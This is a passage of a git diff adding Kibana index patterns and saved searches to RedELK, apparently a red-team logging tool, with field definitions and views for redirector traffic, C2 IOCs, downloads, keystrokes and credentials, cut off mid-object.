"type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.logger", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.offset", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.origin.file.line", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.origin.file.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.origin.function", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.original", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.source.address", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.syslog.facility.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.syslog.facility.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.syslog.priority", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.syslog.severity.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.syslog.severity.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "message", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.pid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "screenshot.full", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "screenshot.thumb", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tags", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.framework", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.tactic.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.tactic.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.tactic.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.technique.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.technique.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "threat.technique.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "threat.technique.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.technique.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.email", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "user.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "user.name" + } + }, + "type": "string" + } + ], + "title": "implantsdb" + }, + "coreMigrationVersion": "7.16.3", + "id": "implantsdb", + "migrationVersion": { + "index-pattern": "7.11.0" + }, + "references": [], + "sort": [ + 1642171862691, + 16 + ], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_iplist.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_iplist.json new file mode 100644 index 00000000..134edd38 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_iplist.json @@ -0,0 +1,146 @@ +[ + { + "attributes": { + "fields": [ + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "@timestamp", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_id" + ], + "name": "_id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_index" + ], + "name": "_index", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "name": "_score", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "_source" + ], + "name": "_source", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "_source" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_type" + ], + "name": "_type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "date_modified", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 1, + "esTypes": [ + "ip" + ], + "name": "ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "last_updated", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "list", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 1, + "esTypes": [ + "keyword" + ], + "name": "source", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + } + ], + "timeFieldName": "@timestamp", + "title": "iplist-*" + }, + "id": "789bb360-2ab1-11eb-bc47-53169c986c81", + "migrationVersion": { + "index-pattern": "7.6.0" + }, + "references": [], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redelk.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redelk.json new file mode 100644 index 00000000..361fd12c --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redelk.json @@ -0,0 +1,222 @@ +[ + { + "attributes": { + "fields": [ + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "@timestamp", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_id" + ], + "name": "_id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_index" + ], + "name": "_index", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "name": "_score", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "_source" + ], + "name": "_source", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "_source" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_type" + ], + "name": "_type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "iplist.comments", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip_range" + ], + "name": "iplist.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "unknown" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "iplist.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "iplist.source", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "module.last_run.count", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "module.last_run.message", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "module.last_run.status", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "module.last_run.timestamp", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "module.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "module.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + } + ], + "title": "redelk-*" + }, + "coreMigrationVersion": "7.16.3", + "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", + "migrationVersion": { + "index-pattern": "7.11.0" + }, + "references": [], + "sort": [ + 1642171866710, + 20 + ], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redirtraffic.json new file mode 100644 index 00000000..8cdcaafd --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redirtraffic.json @@ -0,0 +1,25 @@ +[ + { + "attributes": { + "fieldAttrs": "{\"tags\":{\"count\":1}}", + "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", + "fields": [], + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": "redirtraffic-*", + "typeMeta": "{}" + }, + "coreMigrationVersion": "7.16.3", + "id": "redirtraffic", + "migrationVersion": { + "index-pattern": "7.11.0" + }, + "references": [], + "sort": [ + 1642171868723, + 243 + ], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_rtops.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_rtops.json new file mode 100644 index 00000000..0386f52d --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_rtops.json @@ -0,0 +1,25 @@ +[ + { + "attributes": { + "fieldAttrs": "{\"c2.program\":{\"count\":1}}", + "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", + "fields": [], + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": "rtops-*", + "typeMeta": "{}" + }, + "coreMigrationVersion": "7.16.3", + "id": "rtops", + "migrationVersion": { + "index-pattern": "7.11.0" + }, + "references": [], + "sort": [ + 1642171870762, + 242 + ], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_search.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_search.json new file mode 100644 index 00000000..31cf5e1f --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_search.json @@ -0,0 +1,1188 @@ +[ + { + "attributes": { + "columns": [ + "infra.attack_scenario", + "agent.hostname", + "redir.backend.name", + "source.ip", + "source.domain", + "source.as.organization.name", + "http.request.body.content" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - _Redirector Traffic", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "redirtraffic", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 198 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "infra.attack_scenario", + "user.name", + "host.name", + "ioc.type", + "file.hash.md5", + "file.name", + "file.size", + "ioc.domain" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "ioc" + }, + "type": "phrase" + }, + "query": { + "match": { + "c2.log.type": { + "query": "ioc", + "type": "phrase" + } + } + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "tags:alarm_*" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - C2 IOCs - Alarmed", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 201 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "infra.attack_scenario", + "user.name", + "host.name", + "c2.message" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": true, + "params": { + "query": "events" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "events" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "c2.log.type", + "negate": true, + "params": { + "query": "events_joinleave" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "events_joinleave" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "c2.log.type", + "negate": true, + "params": { + "query": "credentials" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "credentials" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "key": "c2.log.type", + "negate": true, + "params": { + "query": "keystrokes" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "keystrokes" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", + "key": "c2.log.type", + "negate": true, + "params": { + "query": "downloads" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "downloads" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", + "key": "c2.log.type", + "negate": true, + "params": { + "query": "screenshots" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "screenshots" + } + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - _Red Team Operations", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 209 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "infra.attack_scenario", + "host.name", + "user.name", + "file.directory", + "file.name", + "file.url" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "downloads", + "type": "phrase" + }, + "type": "phrase", + "value": "downloads" + }, + "query": { + "match": { + "c2.log.type": { + "query": "downloads", + "type": "phrase" + } + } + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - C2 Downloads", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 212 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "infra.attack_scenario", + "host.name", + "user.name", + "c2.message", + "keystrokes.url" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "keystrokes" + }, + "type": "phrase" + }, + "query": { + "match": { + "c2.log.type": { + "query": "keystrokes", + "type": "phrase" + } + } + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - C2 Keystrokes", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 215 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "creds.realm", + "creds.username", + "creds.credential", + "creds.host", + "creds.source" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - C2 Credentials", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "3fabe620-6c38-11ea-97d6-55783aed877a", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "credentials", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 217 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "infra.attack_scenario", + "user.name", + "host.name", + "ioc.type", + "file.hash.md5", + "file.name", + "file.size", + "ioc.domain" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "ioc" + }, + "type": "phrase" + }, + "query": { + "match": { + "c2.log.type": { + "query": "ioc", + "type": "phrase" + } + } + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - C2 IOCs", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 220 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "module.name", + "module.type", + "module.last_run.timestamp", + "module.last_run.status", + "module.last_run.count", + "module.last_run.message" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "exists": { + "field": "module.name" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "module.name", + "negate": false, + "type": "exists", + "value": "exists" + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [], + "title": "RedELK - Modules status", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "654f76a0-9269-11eb-a753-9da683898c26", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 223 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "infra.attack_scenario", + "redir.backend.name", + "source.ip", + "source.domain", + "source.geo.as.organization.name", + "source.geo.country_iso_code", + "http.request.body.content" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "tags:alarm_*" + }, + "version": true 